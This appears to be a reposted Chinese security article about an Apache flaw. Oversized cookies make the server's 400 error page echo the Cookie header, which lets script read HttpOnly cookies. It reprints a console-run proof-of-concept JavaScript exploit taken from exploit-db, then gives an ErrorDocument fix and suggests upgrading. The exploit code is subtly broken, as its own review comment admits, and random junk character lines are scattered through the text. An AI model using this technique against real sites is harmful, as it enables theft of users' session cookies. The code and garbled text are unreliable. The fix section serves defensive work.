很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 cookie,一般都会给 cookie 加上 HttpOnly 属性,禁止直接用 JS 读取用户的 cookie,从而降低 XSS 的危害;而这个问题恰好可以用来绕过 cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点,按 F12 打开开发者工具,切换到 Console,输入如下代码并回车:
( i. x- D5 h2 Z8 F - j' f: y. Q7 z, ?0 M' O! ]! ^ y
- p L( N; r- s9 W4 [9 l% Z
// http://www.exploit-db.com/exploits/18442/
/**
 * Sets ten filler cookies on the current origin, or expires them again.
 *
 * Each filler cookie ("xss0" .. "xss9") carries 819 bytes of "x". With
 * `good` falsy they are written with path=/; with `good` truthy the same
 * names are rewritten with an expiry in the past, which is how makeRequest
 * cleans up after its request has completed. The oversized Cookie header
 * this produces is presumably what makes the server reject the next request
 * with a 400 (see the status check in makeRequest) — that is an inference
 * from the surrounding post, not something this function verifies.
 *
 * @param {boolean} [good] - truthy to expire the cookies, falsy/omitted to set them.
 * @returns {undefined} The only side effect is on document.cookie.
 */
function setCookies(good) {
  // 819 "x" characters, the same string the original built one char at a time.
  const filler = "x".repeat(819);

  for (let i = 0; i < 10; i++) {
    const name = `xss${i}`;
    let cookie;
    if (good) {
      // One millisecond in the past, so the browser treats the cookie as expired.
      const pastDate = new Date(Date.now() - 1).toUTCString();
      cookie = `${name}=;expires=${pastDate}; path=/;`;
    } else {
      cookie = `${name}=${filler};path=/`;
    }
    document.cookie = cookie;
  }
}
/**
 * Plants the filler cookies, requests "/" on the current origin and, if the
 * server answers 400, parses whatever cookies that error page echoes back.
 *
 * The handler only reacts to a completed request with status 400. It strips
 * newlines from the body, takes the first <pre>...</pre> block, drops a
 * leading "Cookie: " prefix and the filler "xssN=xxx" entries, and splits the
 * rest on ";". It then expires the filler cookies again and shows the parsed
 * map via alert(). On a server whose 400 page does not echo the request
 * headers (the mitigation described further down) there is nothing to read.
 *
 * @returns {undefined} Side effects only: document.cookie, one XHR to "/", alert().
 */
function makeRequest() {
  setCookies();

  const xhr = new XMLHttpRequest();

  const parseCookies = function () {
    const cookieDict = {};
    // Only react once the request is done and was rejected with 400.
    if (xhr.readyState !== 4 || xhr.status !== 400) {
      return;
    }
    // Flatten the body and grab the <pre> block. `match` yields null when
    // there is no <pre>, in which case the `.length` read below throws.
    const preMatch = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
    if (preMatch.length) {
      const header = preMatch[1].replace("Cookie: ", "");
      const cookies = header.replace(/xss\d=x+;?/g, '').split(/;/g);
      for (let i = 0; i < cookies.length; i++) {
        // NOTE(review): `cookies` is an array here, so `.split` is undefined and
        // this throws a TypeError on the first iteration; kept as in the original,
        // which means the cleanup and alert below are never reached on this path.
        const pair = cookies.split('=', 2);
        cookieDict[pair[0]] = pair[1];
      }
    }
    // Expire the filler cookies before reporting.
    setCookies(true);
    alert(JSON.stringify(cookieDict));
  };

  xhr.onreadystatechange = parseCookies;
  xhr.open("GET", "/", true);
  xhr.send(null);
}
// Entry point: runs as soon as the snippet is pasted into the console.
makeRequest();
你就能看见华丽丽的 400 错误响应,其中包含着 cookie 信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
/ Q) A. L$ B8 }9 V( ^) m7 H: h% U! o5 y2 |$ m- F
修复方案:
Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
' ^; m3 D; ?- `$ `# T
In the event of a problem or error, Apache can be configured to do one of four things,
1. output a simple hardcoded error message 输出一个简单生硬的错误代码信息
2. output a customized message 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error 转向一个外部 URL
, K+ e4 X' r3 b& v# R: r' O& N( _- T
经测试,对于 400 错误只有方法 2 有效,返回包不会再包含 cookie 内容。
e' n3 i0 q/ P3 w5 J+ h+ F
Apache配置:
; G% y: Y5 X |
ErrorDocument 400 " security test"
$ H+ P0 S! @* y6 w3 B4 L) q5 J7 i2 E+ N- g
当然,升级 Apache 到最新版本也可以 :)。
: q% a; t: [5 k2 j+ V
参考:http://httpd.apache.org/security/vulnerabilities_22.html
s# S+ o7 n" S+ f |